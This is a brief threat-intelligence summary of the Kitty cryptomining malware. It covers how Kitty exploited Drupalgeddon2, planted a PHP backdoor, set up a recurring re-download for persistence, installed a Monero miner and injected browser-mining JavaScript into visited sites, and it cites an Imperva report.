Kitty is a cryptocurrency-mining malware that uses an open source mining software for browsers called “webminerpool” to mine the Monero cryptocurrency. The malware was first observed in May 2018 exploiting the well-known Drupalgeddon2 vulnerability that allows remote code execution on Drupal web servers. When the malware is installed on a server, a PHP file is written to the infected server disc that allows the threat actors to have a backdoor into the machine. The malware will then create a time-based job scheduler set to re-download and execute a bash script from a remote host every minute, allowing an attacker to re-infect a server, even if updates are attempted. A mining program, XMRig Monero miner, is then installed on the system. Along with the mining process on the infected server, Kitty also aims to infect web app visitors. To accomplish this, the malware searches for the common index.php file and writes the malicious JavaScript file me0w.js to it. Once the PHP file is infected, users visiting the infected web server's sites will be leveraged for cryptocurrency-mining.

Reporting and Technical Details

  • May 2018: Crypto Me0wing Attacks: Kitty Cashes in on Monero. (Imperva)